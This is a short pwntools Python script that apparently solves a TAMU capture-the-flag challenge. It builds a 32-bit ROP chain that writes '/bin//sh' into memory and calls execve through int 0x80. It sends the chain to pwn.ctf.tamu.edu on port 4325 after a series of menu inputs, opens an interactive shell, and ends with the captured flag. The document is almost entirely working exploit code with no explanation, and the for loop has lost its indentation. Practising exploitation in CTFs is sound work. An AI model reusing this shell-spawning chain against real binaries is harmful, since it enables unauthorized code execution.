Rating: 1.0
```python
# -*-coding:utf-8 -*
from pwn import *
p = "A"*32
p += p32( 0x0807338a) # pop edx ; ret
p += p32( 0x080f0060)
p += p32( 0x080bc396) # pop eax ; ret
p += '/bin'
p += p32( 0x0805512b) # mov dword ptr [edx], eax ; ret
p += p32( 0x0807338a) # pop edx ; ret
p += p32( 0x080f0064)
p += p32( 0x080bc396) # pop eax ; ret
p += '//sh'
p += p32( 0x0805512b) # mov dword ptr [edx], eax ; ret
p += p32( 0x0807338a) # pop edx ; ret
p += p32( 0x080f0068)
p += p32( 0x080496b3) # xor eax, eax ; ret
p += p32( 0x0805512b) # mov dword ptr [edx], eax ; ret
p += p32( 0x08058b0f) # pop ebx ; ret
p += p32( 0x080f0060)
p += p32( 0x080e4325) # pop ecx ; ret
p += p32( 0x00000000)
p += p32( 0x0807338a) # pop edx ; ret
p += p32( 0x00000000)
p += p32( 0x080496b3) # xor eax, eax ; ret
for i in range(11):
p += p32( 0x0807ebcf) # inc eax ; ret
p += p32( 0x0807398e) # int 0x80
re = remote("pwn.ctf.tamu.edu",4325)
re.send("test"+"\n")
re.send("test"+"\n")
re.send("nom"+"\n")
re.send("y"+"\n")
re.send("2"+"\n")
re.send(p)
re.send("\n")
re.interactive()
re.close();
#flag = gigem{r37urn_0f_7h3_pwn}
```
